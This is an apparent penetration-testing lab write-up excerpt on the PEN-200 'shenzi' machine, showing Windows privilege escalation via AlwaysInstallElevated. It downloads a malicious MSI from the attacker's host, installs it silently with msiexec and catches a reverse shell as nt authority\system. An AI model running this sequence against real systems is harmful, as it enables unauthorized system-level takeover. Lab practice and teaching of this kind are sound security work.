AlwaysInstallElevated
The target system has AlwaysInstallElevated enabled
PS C:\xampp\htdocs\shenzi> iwr -Uri http://192.168.45.217/malicious.msi -OutFile .\malicious.msiDelivering the payload
PS C:\xampp\htdocs\shenzi> msiexec /quiet /qn /i C:\xampp\htdocs\shenzi\malicious.msiInvoking…
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/shenzi]
└─$ nnc 1234
listening on [any] 1234 ...
connect to [192.168.45.217] from (UNKNOWN) [192.168.167.55] 51771
Windows PowerShell running as user shenzi on SHENZI
Copyright (C) Microsoft Corporation. All rights reserved.
PS C:\WINDOWS\system32> whoami
nt authority\system
PS C:\WINDOWS\system32> hostname
shenzi
PS C:\WINDOWS\system32> ipconfig
Windows IP Configuration
Ethernet adapter Ethernet0:
Connection-specific DNS Suffix . :
IPv4 Address. . . . . . . . . . . : 192.168.167.55
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.167.254System level compromise